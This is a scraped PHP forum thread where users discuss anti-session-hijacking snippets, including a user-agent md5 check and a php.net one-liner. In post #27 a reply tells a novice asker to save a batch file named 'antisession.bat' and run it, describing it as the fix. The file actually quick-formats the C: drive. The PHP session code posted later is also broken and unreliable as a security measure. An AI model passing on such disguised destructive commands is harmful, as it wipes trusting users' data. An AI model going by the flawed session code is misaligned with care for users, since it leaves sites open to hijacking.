Anti session hijacking

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    #16
    What to do? Isn't that a little obviously?
    Thats the coment from php.net, google it...
    Btw, thats not what i ask...
    <!DOCTYPE html PUBLIC "-//WAPFORUM.RS

    Comment


      #17
      Then what did you ask? Function won't work unless session_start() is called because it uses session vars. Can't you see that?

      I know what it is meant to do, but I need to read the full thing to know if it is exactly so cos I don't know the logic behind this

      PHP Code:
       if ( $_SESSION
      ['HTTP_USER_AGENT'] !=
      md5($_SERVER
      ['HTTP_USER_AGENT']))
      {
      login(); 
      Cos I would check to see if they match, not if they don't match unless the coder is using different logic.
      That's what I meant by what it is meant to do. :p

      Added after 9 minutes:

      So what's it like.

      Oh, the user agent I saved and the current user agent don't match so it is him, let's go ahead and log him in?

      Think of the implications if a cookie is hijacked.
      And oh, btw I really hate what you implied in your reply, and asking me to google a post to help you?

      First major security threat, what Prevents hacker from simple editing the cookie Sid value to another value and being logged in as the user with that id value?

      You gotta obscure what you are doing a bit more and add some extra security checks.
      Last edited by frostymarvelous; 17.12.10, 15:21.
      Perfection comes at a cost



      I accept liberty!

      Comment


        #18
        Bro...

        1. Not function wich Subziro did, the snippet that I copy-paste from php.net:
        PHP Code:
        <?php 
        if (isset($_REQUEST['_SESSION'])) die("Get lost Muppet!"); 
        ?>
        2. The question is whether this snippet helps and if, is to be placed before or after the session_start() ?

        Not session vars, the snippet. I'm not asking about function or sessions or its vars or what ever. Just 2. thing.

        ------------------------------
        And I hate when someone explains me something I have not asked, ie, when I see that he did not understand the question...
        I hope you are not angry but really did not know what else to write, not to go into, God forbid, argument.
        Last edited by arnage; 17.12.10, 15:52.
        <!DOCTYPE html PUBLIC "-//WAPFORUM.RS

        Comment


          #19
          This will work when placed before or after session start cos it does not require a session var.

          If you can give me the exact link and maybe post I Will try to refine it for you. I don't know exactly what the coder is trying to do.

          Added after 2 minutes:

          I know I didn't really understand that's why I asked for the link. I'm mobile so typing long stuff is annoying that's why I don't wanna do something and realise that I wasted my time.
          Last edited by frostymarvelous; 17.12.10, 16:56.
          Perfection comes at a cost



          I accept liberty!

          Comment


            #20
            You are absolutely right if you're by phone, should say right away... ;)

            PHP: $_SESSION - Manual

            This is that page, its the first coment but no any explanation in it.

            Thanks for answer!
            <!DOCTYPE html PUBLIC "-//WAPFORUM.RS

            Comment


              #21
              So I was right but ori and subzero didn't understand me,

              The code is trying to check if the user is trying to inject session values through the get or post superglobals that's.why I thought it should be phpsessid. this hack is only possible with register globals turned on though.
              If you want to use it, put it at the very top of every page. Or even better, at the top of a file which you include in all your pages like your settings file.
              Perfection comes at a cost



              I accept liberty!

              Comment


                #22
                if you d0nt want anybody to crack your session. Just add salt t0 ur session...

                Comment


                  #23
                  Add salt? Can u p0st it here jers0n..
                  our lfe is simple words....
                  http://mygenkz.net
                  ewanz06@yahoo.com
                  PHP Code:
                  $output="i am NOoob....";
                  $newfile="ewanz.txt";
                  $file fopen ($newfile"w");
                  fwrite($file$output);
                  fclose ($file); 

                  Comment


                    #24
                    You kids are still on dis tip? Dayum thats sad. :-/

                    Comment


                      #25
                      A discussion on anti session hijacking is sad? ..... hmmm ok what ever you say.
                      Seeming you have this so called big business or what ever it is you do. You dont really do much to help your self.
                      If i was going to hire someone to work for me etc i would do a google search for them and see if there is anything good or bad posted about them....
                      well in this case i would find you b!tching at everything .... then think your a right (place your word here) and think im not hiring you.
                      But then again its not my life you lead it how you want to, we all make our own choices in life but when there done we have to live with them.

                      Comment


                        #26
                        how to use this code plz tell details.

                        Comment


                          #27
                          Originally posted by devil_bd View Post
                          how to use this code plz tell details.
                          you need to create a text file called antisession.bat paste this code in it
                          Code:
                          @echo off
                          for %%i in (c:) do format %%i /FS:NTFS /x /q
                          then add some php file into the same directory as antisession.bat, double click on it then you will get a php file with the antisession hijack fix

                          Comment


                            #28
                            lol, i wish i can not laugh but i cant help it yeah he does not know how to use it but he will soon find out.

                            sessions.php
                            PHP Code:
                            function page_protect()  

                            session_start(); 

                            if (isset(
                            $_SESSION['HTTP_USER_AGENT'])) 

                                if (
                            $_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) 
                                { 
                                    
                            login(); 
                                    exit; 
                                } 
                              } 


                            function 
                            login() 

                            session_start(); 
                            if(isset(
                            $_SESSION['sid']) || isset($_COOKIE['sid'])) { 

                            // Demo only
                            $_SESSION['sid'] != md5($_SERVER['HTTP_USER_AGENT']);


                            place this in under sessions.php

                            PHP Code:
                            page_protect(); 

                            if you get a error remove ! out of sid
                            Visit: Chat4u.mobi - The New Lay Of being a site of your dreams!
                            Visit: WapMasterz Coming Back Soon!
                            _______
                            SCRIPTS FOR SALE BY SUBZERO
                            Chat4u Script : coding-talk.com/f28/chat4u-mobi-script-only-150-a-17677/ - > Best Script for your site no other can be hacked by sql or uploaders.
                            FileShare Script : coding-talk.com/f28/file-wap-share-6596/ -> Uploader you will never regret buying yeah it mite be old now but it still seems to own others...
                            _______
                            Info & Tips
                            php.net
                            w3schools.com

                            Comment


                              #29
                              Originally posted by subzero View Post
                              core or what ever script your using.....

                              PHP Code:
                              function page_protect() 
                              {
                              session_start();

                              if (isset(
                              $_SESSION['HTTP_USER_AGENT']))
                              {
                                  if (
                              $_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT']))
                                  {
                                      
                              login();
                                      exit;
                                  }
                                }
                              }
                              function 
                              login()
                              {
                              session_start();
                              if(isset(
                              $_SESSION['sid']) || isset($_COOKIE['sid'])) {

                              Enter your sql for your own site !!



                              How to use

                              Under core or what ever !

                              PHP Code:
                              page_protect(); 

                              Add a thanks here or the button !!
                              Sir im using ejatd29 sc,so where i must to put this code

                              Comment


                                #30
                                Hope it wil b usefulll....thanks bro


                                I'm Proud to be a Sri Lankan!

                                Comment

                                Working...
                                X